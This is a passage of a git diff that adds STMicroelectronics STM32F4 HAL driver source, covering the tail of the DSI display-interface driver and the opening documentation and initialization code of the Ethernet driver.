in ULPM) + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_ExitULPM(DSI_HandleTypeDef *hdsi) +{ + uint32_t tickstart; + + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Turn on the DSI PLL */ + __HAL_DSI_PLL_ENABLE(hdsi); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait for the lock of the PLL */ + while (__HAL_DSI_GET_FLAG(hdsi, DSI_FLAG_PLLLS) == 0U) + { + /* Check for the Timeout */ + if ((HAL_GetTick() - tickstart) > DSI_TIMEOUT_VALUE) + { + /* Process Unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_TIMEOUT; + } + } + + /* Exit ULPS on Clock and Data Lanes */ + hdsi->Instance->PUCR |= (DSI_PUCR_UECL | DSI_PUCR_UEDL); + + /* Get tick */ + tickstart = HAL_GetTick(); + + /* Wait until all active lanes exit ULPM */ + if ((hdsi->Instance->PCONFR & DSI_PCONFR_NL) == DSI_ONE_DATA_LANE) + { + while ((hdsi->Instance->PSR & (DSI_PSR_UAN0 | DSI_PSR_UANC)) != (DSI_PSR_UAN0 | DSI_PSR_UANC)) + { + /* Check for the Timeout */ + if ((HAL_GetTick() - tickstart) > DSI_TIMEOUT_VALUE) + { + /* Process Unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_TIMEOUT; + } + } + } + else if ((hdsi->Instance->PCONFR & DSI_PCONFR_NL) == DSI_TWO_DATA_LANES) + { + while ((hdsi->Instance->PSR & (DSI_PSR_UAN0 | DSI_PSR_UAN1 | DSI_PSR_UANC)) != (DSI_PSR_UAN0 | DSI_PSR_UAN1 | + DSI_PSR_UANC)) + { + /* Check for the Timeout */ + if ((HAL_GetTick() - tickstart) > DSI_TIMEOUT_VALUE) + { + /* Process Unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_TIMEOUT; + } + } + } + else + { + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_ERROR; + } + + /* wait for 1 ms */ + HAL_Delay(1U); + + /* De-assert the ULPM requests and the ULPM exit bits */ + hdsi->Instance->PUCR = 0U; + + /* Switch the lanbyteclock source in the RCC from system PLL to D-PHY */ + __HAL_RCC_DSI_CONFIG(RCC_DSICLKSOURCE_DSIPHY); + + /* Restore clock lane configuration to HS */ + hdsi->Instance->CLCR |= DSI_CLCR_DPCC; + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Start test pattern generation + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param Mode Pattern generator mode + * This parameter can be one of the following values: + * 0 : Color bars (horizontal or vertical) + * 1 : BER pattern (vertical only) + * @param Orientation Pattern generator orientation + * This parameter can be one of the following values: + * 0 : Vertical color bars + * 1 : Horizontal color bars + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_PatternGeneratorStart(DSI_HandleTypeDef *hdsi, uint32_t Mode, uint32_t Orientation) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Configure pattern generator mode and orientation */ + hdsi->Instance->VMCR &= ~(DSI_VMCR_PGM | DSI_VMCR_PGO); + hdsi->Instance->VMCR |= ((Mode << 20U) | (Orientation << 24U)); + + /* Enable pattern generator by setting PGE bit */ + hdsi->Instance->VMCR |= DSI_VMCR_PGE; + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Stop test pattern generation + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_PatternGeneratorStop(DSI_HandleTypeDef *hdsi) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Disable pattern generator by clearing PGE bit */ + hdsi->Instance->VMCR &= ~DSI_VMCR_PGE; + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Set Slew-Rate And Delay Tuning + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param CommDelay Communication delay to be adjusted. + * This parameter can be any value of @arg DSI_Communication_Delay + * @param Lane select between clock or data lanes. + * This parameter can be any value of @arg DSI_Lane_Group + * @param Value Custom value of the slew-rate or delay + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_SetSlewRateAndDelayTuning(DSI_HandleTypeDef *hdsi, uint32_t CommDelay, uint32_t Lane, + uint32_t Value) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Check function parameters */ + assert_param(IS_DSI_COMMUNICATION_DELAY(CommDelay)); + assert_param(IS_DSI_LANE_GROUP(Lane)); + + switch (CommDelay) + { + case DSI_SLEW_RATE_HSTX: + if (Lane == DSI_CLOCK_LANE) + { + /* High-Speed Transmission Slew Rate Control on Clock Lane */ + hdsi->Instance->WPCR[1U] &= ~DSI_WPCR1_HSTXSRCCL; + hdsi->Instance->WPCR[1U] |= Value << 16U; + } + else if (Lane == DSI_DATA_LANES) + { + /* High-Speed Transmission Slew Rate Control on Data Lanes */ + hdsi->Instance->WPCR[1U] &= ~DSI_WPCR1_HSTXSRCDL; + hdsi->Instance->WPCR[1U] |= Value << 18U; + } + else + { + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_ERROR; + } + break; + case DSI_SLEW_RATE_LPTX: + if (Lane == DSI_CLOCK_LANE) + { + /* Low-Power transmission Slew Rate Compensation on Clock Lane */ + hdsi->Instance->WPCR[1U] &= ~DSI_WPCR1_LPSRCCL; + hdsi->Instance->WPCR[1U] |= Value << 6U; + } + else if (Lane == DSI_DATA_LANES) + { + /* Low-Power transmission Slew Rate Compensation on Data Lanes */ + hdsi->Instance->WPCR[1U] &= ~DSI_WPCR1_LPSRCDL; + hdsi->Instance->WPCR[1U] |= Value << 8U; + } + else + { + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_ERROR; + } + break; + case DSI_HS_DELAY: + if (Lane == DSI_CLOCK_LANE) + { + /* High-Speed Transmission Delay on Clock Lane */ + hdsi->Instance->WPCR[1U] &= ~DSI_WPCR1_HSTXDCL; + hdsi->Instance->WPCR[1U] |= Value; + } + else if (Lane == DSI_DATA_LANES) + { + /* High-Speed Transmission Delay on Data Lanes */ + hdsi->Instance->WPCR[1U] &= ~DSI_WPCR1_HSTXDDL; + hdsi->Instance->WPCR[1U] |= Value << 2U; + } + else + { + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_ERROR; + } + break; + default: + break; + } + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Low-Power Reception Filter Tuning + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param Frequency cutoff frequency of low-pass filter at the input of LPRX + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_SetLowPowerRXFilter(DSI_HandleTypeDef *hdsi, uint32_t Frequency) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Low-Power RX low-pass Filtering Tuning */ + hdsi->Instance->WPCR[1U] &= ~DSI_WPCR1_LPRXFT; + hdsi->Instance->WPCR[1U] |= Frequency << 25U; + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Activate an additional current path on all lanes to meet the SDDTx parameter + * defined in the MIPI D-PHY specification + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param State ENABLE or DISABLE + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_SetSDD(DSI_HandleTypeDef *hdsi, FunctionalState State) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Check function parameters */ + assert_param(IS_FUNCTIONAL_STATE(State)); + + /* Activate/Disactivate additional current path on all lanes */ + hdsi->Instance->WPCR[1U] &= ~DSI_WPCR1_SDDC; + hdsi->Instance->WPCR[1U] |= ((uint32_t)State << 12U); + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Custom lane pins configuration + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param CustomLane Function to be applied on selected lane. + * This parameter can be any value of @arg DSI_CustomLane + * @param Lane select between clock or data lane 0 or data lane 1. + * This parameter can be any value of @arg DSI_Lane_Select + * @param State ENABLE or DISABLE + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_SetLanePinsConfiguration(DSI_HandleTypeDef *hdsi, uint32_t CustomLane, uint32_t Lane, + FunctionalState State) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Check function parameters */ + assert_param(IS_DSI_CUSTOM_LANE(CustomLane)); + assert_param(IS_DSI_LANE(Lane)); + assert_param(IS_FUNCTIONAL_STATE(State)); + + switch (CustomLane) + { + case DSI_SWAP_LANE_PINS: + if (Lane == DSI_CLK_LANE) + { + /* Swap pins on clock lane */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_SWCL; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 6U); + } + else if (Lane == DSI_DATA_LANE0) + { + /* Swap pins on data lane 0 */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_SWDL0; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 7U); + } + else if (Lane == DSI_DATA_LANE1) + { + /* Swap pins on data lane 1 */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_SWDL1; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 8U); + } + else + { + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_ERROR; + } + break; + case DSI_INVERT_HS_SIGNAL: + if (Lane == DSI_CLK_LANE) + { + /* Invert HS signal on clock lane */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_HSICL; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 9U); + } + else if (Lane == DSI_DATA_LANE0) + { + /* Invert HS signal on data lane 0 */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_HSIDL0; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 10U); + } + else if (Lane == DSI_DATA_LANE1) + { + /* Invert HS signal on data lane 1 */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_HSIDL1; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 11U); + } + else + { + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_ERROR; + } + break; + default: + break; + } + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Set custom timing for the PHY + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param Timing PHY timing to be adjusted. + * This parameter can be any value of @arg DSI_PHY_Timing + * @param State ENABLE or DISABLE + * @param Value Custom value of the timing + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_SetPHYTimings(DSI_HandleTypeDef *hdsi, uint32_t Timing, FunctionalState State, uint32_t Value) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Check function parameters */ + assert_param(IS_DSI_PHY_TIMING(Timing)); + assert_param(IS_FUNCTIONAL_STATE(State)); + + switch (Timing) + { + case DSI_TCLK_POST: + /* Enable/Disable custom timing setting */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_TCLKPOSTEN; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 27U); + + if (State != DISABLE) + { + /* Set custom value */ + hdsi->Instance->WPCR[4U] &= ~DSI_WPCR4_TCLKPOST; + hdsi->Instance->WPCR[4U] |= Value & DSI_WPCR4_TCLKPOST; + } + + break; + case DSI_TLPX_CLK: + /* Enable/Disable custom timing setting */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_TLPXCEN; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 26U); + + if (State != DISABLE) + { + /* Set custom value */ + hdsi->Instance->WPCR[3U] &= ~DSI_WPCR3_TLPXC; + hdsi->Instance->WPCR[3U] |= (Value << 24U) & DSI_WPCR3_TLPXC; + } + + break; + case DSI_THS_EXIT: + /* Enable/Disable custom timing setting */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_THSEXITEN; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 25U); + + if (State != DISABLE) + { + /* Set custom value */ + hdsi->Instance->WPCR[3U] &= ~DSI_WPCR3_THSEXIT; + hdsi->Instance->WPCR[3U] |= (Value << 16U) & DSI_WPCR3_THSEXIT; + } + + break; + case DSI_TLPX_DATA: + /* Enable/Disable custom timing setting */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_TLPXDEN; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 24U); + + if (State != DISABLE) + { + /* Set custom value */ + hdsi->Instance->WPCR[3U] &= ~DSI_WPCR3_TLPXD; + hdsi->Instance->WPCR[3U] |= (Value << 8U) & DSI_WPCR3_TLPXD; + } + + break; + case DSI_THS_ZERO: + /* Enable/Disable custom timing setting */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_THSZEROEN; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 23U); + + if (State != DISABLE) + { + /* Set custom value */ + hdsi->Instance->WPCR[3U] &= ~DSI_WPCR3_THSZERO; + hdsi->Instance->WPCR[3U] |= Value & DSI_WPCR3_THSZERO; + } + + break; + case DSI_THS_TRAIL: + /* Enable/Disable custom timing setting */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_THSTRAILEN; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 22U); + + if (State != DISABLE) + { + /* Set custom value */ + hdsi->Instance->WPCR[2U] &= ~DSI_WPCR2_THSTRAIL; + hdsi->Instance->WPCR[2U] |= (Value << 24U) & DSI_WPCR2_THSTRAIL; + } + + break; + case DSI_THS_PREPARE: + /* Enable/Disable custom timing setting */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_THSPREPEN; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 21U); + + if (State != DISABLE) + { + /* Set custom value */ + hdsi->Instance->WPCR[2U] &= ~DSI_WPCR2_THSPREP; + hdsi->Instance->WPCR[2U] |= (Value << 16U) & DSI_WPCR2_THSPREP; + } + + break; + case DSI_TCLK_ZERO: + /* Enable/Disable custom timing setting */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_TCLKZEROEN; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 20U); + + if (State != DISABLE) + { + /* Set custom value */ + hdsi->Instance->WPCR[2U] &= ~DSI_WPCR2_TCLKZERO; + hdsi->Instance->WPCR[2U] |= (Value << 8U) & DSI_WPCR2_TCLKZERO; + } + + break; + case DSI_TCLK_PREPARE: + /* Enable/Disable custom timing setting */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_TCLKPREPEN; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 19U); + + if (State != DISABLE) + { + /* Set custom value */ + hdsi->Instance->WPCR[2U] &= ~DSI_WPCR2_TCLKPREP; + hdsi->Instance->WPCR[2U] |= Value & DSI_WPCR2_TCLKPREP; + } + + break; + default: + break; + } + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Force the Clock/Data Lane in TX Stop Mode + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param Lane select between clock or data lanes. + * This parameter can be any value of @arg DSI_Lane_Group + * @param State ENABLE or DISABLE + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_ForceTXStopMode(DSI_HandleTypeDef *hdsi, uint32_t Lane, FunctionalState State) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Check function parameters */ + assert_param(IS_DSI_LANE_GROUP(Lane)); + assert_param(IS_FUNCTIONAL_STATE(State)); + + if (Lane == DSI_CLOCK_LANE) + { + /* Force/Unforce the Clock Lane in TX Stop Mode */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_FTXSMCL; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 12U); + } + else if (Lane == DSI_DATA_LANES) + { + /* Force/Unforce the Data Lanes in TX Stop Mode */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_FTXSMDL; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 13U); + } + else + { + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_ERROR; + } + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Force LP Receiver in Low-Power Mode + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param State ENABLE or DISABLE + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_ForceRXLowPower(DSI_HandleTypeDef *hdsi, FunctionalState State) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Check function parameters */ + assert_param(IS_FUNCTIONAL_STATE(State)); + + /* Force/Unforce LP Receiver in Low-Power Mode */ + hdsi->Instance->WPCR[1U] &= ~DSI_WPCR1_FLPRXLPM; + hdsi->Instance->WPCR[1U] |= ((uint32_t)State << 22U); + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Force Data Lanes in RX Mode after a BTA + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param State ENABLE or DISABLE + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_ForceDataLanesInRX(DSI_HandleTypeDef *hdsi, FunctionalState State) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Check function parameters */ + assert_param(IS_FUNCTIONAL_STATE(State)); + + /* Force Data Lanes in RX Mode */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_TDDL; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 16U); + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Enable a pull-down on the lanes to prevent from floating states when unused + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param State ENABLE or DISABLE + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_SetPullDown(DSI_HandleTypeDef *hdsi, FunctionalState State) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Check function parameters */ + assert_param(IS_FUNCTIONAL_STATE(State)); + + /* Enable/Disable pull-down on lanes */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_PDEN; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 18U); + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @brief Switch off the contention detection on data lanes + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @param State ENABLE or DISABLE + * @retval HAL status + */ +HAL_StatusTypeDef HAL_DSI_SetContentionDetectionOff(DSI_HandleTypeDef *hdsi, FunctionalState State) +{ + /* Process locked */ + __HAL_LOCK(hdsi); + + /* Check function parameters */ + assert_param(IS_FUNCTIONAL_STATE(State)); + + /* Contention Detection on Data Lanes OFF */ + hdsi->Instance->WPCR[0U] &= ~DSI_WPCR0_CDOFFDL; + hdsi->Instance->WPCR[0U] |= ((uint32_t)State << 14U); + + /* Process unlocked */ + __HAL_UNLOCK(hdsi); + + return HAL_OK; +} + +/** + * @} + */ + +/** @defgroup DSI_Group4 Peripheral State and Errors functions + * @brief Peripheral State and Errors functions + * +@verbatim + =============================================================================== + ##### Peripheral State and Errors functions ##### + =============================================================================== + [..] + This subsection provides functions allowing to + (+) Check the DSI state. + (+) Get error code. + +@endverbatim + * @{ + */ + +/** + * @brief Return the DSI state + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @retval HAL state + */ +HAL_DSI_StateTypeDef HAL_DSI_GetState(DSI_HandleTypeDef *hdsi) +{ + return hdsi->State; +} + +/** + * @brief Return the DSI error code + * @param hdsi pointer to a DSI_HandleTypeDef structure that contains + * the configuration information for the DSI. + * @retval DSI Error Code + */ +uint32_t HAL_DSI_GetError(DSI_HandleTypeDef *hdsi) +{ + /* Get the error code */ + return hdsi->ErrorCode; +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* DSI */ + +#endif /* HAL_DSI_MODULE_ENABLED */ + +/** + * @} + */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_eth.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_eth.c new file mode 100644 index 000000000..dbaeb3eee --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_eth.c @@ -0,0 +1,2309 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_eth.c + * @author MCD Application Team + * @brief ETH HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the Ethernet (ETH) peripheral: + * + Initialization and de-initialization functions + * + IO operation functions + * + Peripheral Control functions + * + Peripheral State and Errors functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + (#)Declare a ETH_HandleTypeDef handle structure, for example: + ETH_HandleTypeDef heth; + + (#)Fill parameters of Init structure in heth handle + + (#)Call HAL_ETH_Init() API to initialize the Ethernet peripheral (MAC, DMA, ...) + + (#)Initialize the ETH low level resources through the HAL_ETH_MspInit() API: + (##) Enable the Ethernet interface clock using + (+++) __HAL_RCC_ETHMAC_CLK_ENABLE(); + (+++) __HAL_RCC_ETHMACTX_CLK_ENABLE(); + (+++) __HAL_RCC_ETHMACRX_CLK_ENABLE(); + + (##) Initialize the related GPIO clocks + (##) Configure Ethernet pin-out + (##) Configure Ethernet NVIC interrupt (IT mode) + + (#)Initialize Ethernet DMA Descriptors in chain mode and point to allocated buffers: + (##) HAL_ETH_DMATxDescListInit(); for Transmission process + (##) HAL_ETH_DMARxDescListInit(); for Reception process + + (#)Enable MAC and DMA transmission and reception: + (##) HAL_ETH_Start(); + + (#)Prepare ETH DMA TX Descriptors and give the hand to ETH DMA to transfer + the frame to MAC TX FIFO: + (##) HAL_ETH_TransmitFrame(); + + (#)Poll for a received frame in ETH RX DMA Descriptors and get received + frame parameters + (##) HAL_ETH_GetReceivedFrame(); (should be called into an infinite loop) + + (#) Get a received frame when an ETH RX interrupt occurs: + (##) HAL_ETH_GetReceivedFrame_IT(); (called in IT mode only) + + (#) Communicate with external PHY device: + (##) Read a specific register from the PHY + HAL_ETH_ReadPHYRegister(); + (##) Write data to a specific RHY register: + HAL_ETH_WritePHYRegister(); + + (#) Configure the Ethernet MAC after ETH peripheral initialization + HAL_ETH_ConfigMAC(); all MAC parameters should be filled. + + (#) Configure the Ethernet DMA after ETH peripheral initialization + HAL_ETH_ConfigDMA(); all DMA parameters should be filled. + + -@- The PTP protocol and the DMA descriptors ring mode are not supported + in this driver +*** Callback registration *** + ============================================= + + The compilation define USE_HAL_ETH_REGISTER_CALLBACKS when set to 1 + allows the user to configure dynamically the driver callbacks. + Use Function @ref HAL_ETH_RegisterCallback() to register an interrupt callback. + + Function @ref HAL_ETH_RegisterCallback() allows to register following callbacks: + (+) TxCpltCallback : Tx Complete Callback. + (+) RxCpltCallback : Rx Complete Callback. + (+) DMAErrorCallback : DMA Error Callback. + (+) MspInitCallback : MspInit Callback. + (+) MspDeInitCallback: MspDeInit Callback. + + This function takes as parameters the HAL peripheral handle, the Callback ID + and a pointer to the user callback function. + + Use function @ref HAL_ETH_UnRegisterCallback() to reset a callback to the default + weak function. + @ref HAL_ETH_UnRegisterCallback takes as parameters the HAL peripheral handle, + and the Callback ID. + This function allows to reset following callbacks: + (+) TxCpltCallback : Tx Complete Callback. + (+) RxCpltCallback : Rx Complete Callback. + (+) DMAErrorCallback : DMA Error Callback. + (+) MspInitCallback : MspInit Callback. + (+) MspDeInitCallback: MspDeInit Callback. + + By default, after the HAL_ETH_Init and when the state is HAL_ETH_STATE_RESET + all callbacks are set to the corresponding weak functions: + examples @ref HAL_ETH_TxCpltCallback(), @ref HAL_ETH_RxCpltCallback(). + Exception done for MspInit and MspDeInit functions that are + reset to the legacy weak function in the HAL_ETH_Init/ @ref HAL_ETH_DeInit only when + these callbacks are null (not registered beforehand). + if not, MspInit or MspDeInit are not null, the HAL_ETH_Init/ @ref HAL_ETH_DeInit + keep and use the user MspInit/MspDeInit callbacks (registered beforehand) + + Callbacks can be registered/unregistered in HAL_ETH_STATE_READY state only. + Exception done MspInit/MspDeInit that can be registered/unregistered + in HAL_ETH_STATE_READY or HAL_ETH_STATE_RESET state, + thus registered (user) MspInit/DeInit callbacks can be used during the Init/DeInit. + In that case first register the MspInit/MspDeInit user callbacks + using @ref HAL_ETH_RegisterCallback() before calling @ref HAL_ETH_DeInit + or HAL_ETH_Init function. + + When The compilation define USE_HAL_ETH_REGISTER_CALLBACKS is set to 0 or + not defined, the callback registration feature is not available and all callbacks + are set to the corresponding weak functions. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2017 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ + +/** @defgroup ETH ETH + * @brief ETH HAL module driver + * @{ + */ + +#ifdef HAL_ETH_MODULE_ENABLED + +#if defined(STM32F407xx) || defined(STM32F417xx) || defined(STM32F427xx) || defined(STM32F437xx) ||\ + defined(STM32F429xx) || defined(STM32F439xx) || defined(STM32F469xx) || defined(STM32F479xx) + +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/** @defgroup ETH_Private_Constants ETH Private Constants + * @{ + */ +#define ETH_TIMEOUT_SWRESET 500U +#define ETH_TIMEOUT_LINKED_STATE 5000U +#define ETH_TIMEOUT_AUTONEGO_COMPLETED 5000U + +/** + * @} + */ +/* Private macro -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private function prototypes -----------------------------------------------*/ +/** @defgroup ETH_Private_Functions ETH Private Functions + * @{ + */ +static void ETH_MACDMAConfig(ETH_HandleTypeDef *heth, uint32_t err); +static void ETH_MACAddressConfig(ETH_HandleTypeDef *heth, uint32_t MacAddr, uint8_t *Addr); +static void ETH_MACReceptionEnable(ETH_HandleTypeDef *heth); +static void ETH_MACReceptionDisable(ETH_HandleTypeDef *heth); +static void ETH_MACTransmissionEnable(ETH_HandleTypeDef *heth); +static void ETH_MACTransmissionDisable(ETH_HandleTypeDef *heth); +static void ETH_DMATransmissionEnable(ETH_HandleTypeDef *heth); +static void ETH_DMATransmissionDisable(ETH_HandleTypeDef *heth); +static void ETH_DMAReceptionEnable(ETH_HandleTypeDef *heth); +static void ETH_DMAReceptionDisable(ETH_HandleTypeDef *heth); +static void ETH_FlushTransmitFIFO(ETH_HandleTypeDef *heth); +static void ETH_Delay(uint32_t mdelay); +#if (USE_HAL_ETH_REGISTER_CALLBACKS == 1) +static void ETH_InitCallbacksToDefault(ETH_HandleTypeDef *heth); +#endif /* USE_HAL_ETH_REGISTER_CALLBACKS */ + +/** + * @} + */ +/* Private functions ---------------------------------------------------------*/ + +/** @defgroup ETH_Exported_Functions ETH Exported Functions + * @{ + */ + +/** @defgroup ETH_Exported_Functions_Group1 Initialization and de-initialization functions + * @brief Initialization and Configuration functions + * + @verbatim + =============================================================================== + ##### Initialization and de-initialization functions ##### + =============================================================================== + [..] This section provides functions allowing to: + (+) Initialize and configure the Ethernet peripheral + (+) De-initialize the Ethernet peripheral + + @endverbatim + * @{ + */ + +/** + * @brief Initializes the Ethernet MAC and DMA according to default + * parameters. + * @param heth pointer to a ETH_HandleTypeDef structure that contains + * the configuration information for ETHERNET module + * @retval HAL status + */ +HAL_StatusTypeDef HAL_ETH_Init(ETH_HandleTypeDef *heth) +{ + uint32_t tmpreg1 = 0U, phyreg = 0U; + uint32_t hclk = 60000000U; + uint32_t tickstart = 0U; + uint32_t err = ETH_SUCCESS; + + /* Check the ETH peripheral state */ + if(heth == NULL) + { + return HAL_ERROR; + } + + /* Check parameters */ + assert_param(IS_ETH_AUTONEGOTIATION(heth->Init.AutoNegotiation)); + assert_param(IS_ETH_RX_MODE(heth->Init.RxMode)); + assert_param(IS_ETH_CHECKSUM_MODE(heth->Init.ChecksumMode)); + assert_param(IS_ETH_MEDIA_INTERFACE(heth->Init.MediaInterface)); + + if(heth->State == HAL_ETH_STATE_RESET) + { + /* Allocate lock resource and initialize it */ + heth->Lock = HAL_UNLOCKED; +#if (USE_HAL_ETH_REGISTER_CALLBACKS == 1) + ETH_InitCallbacksToDefault(heth); + + if(heth->MspInitCallback == NULL) + { + /* Init the low level hardware : GPIO, CLOCK, NVIC. */ + heth->MspInitCallback = HAL_ETH_MspInit; + } + heth->MspInitCallback(heth); + +#else + /* Init the low level hardware : GPIO, CLOCK, NVIC. */ + HAL_ETH_MspInit(heth); +#endif /* USE_HAL_ETH_REGISTER_CALLBACKS */ + } + + /* Enable SYSCFG Clock */ + __HAL_RCC_SYSCFG_CLK_ENABLE(); + + /* Select MII or RMII Mode*/ + SYSCFG->PMC &= ~(SYSCFG_PMC_MII_RMII_SEL); + SYSCFG->PMC |= (uint32_t)heth->Init.MediaInterface; + + /* Ethernet Software reset */ + /* Set the SWR bit: resets all MAC subsystem internal registers and logic */ + /* After reset all the registers holds their respective reset values */ + (heth->Instance)->DMABMR |= 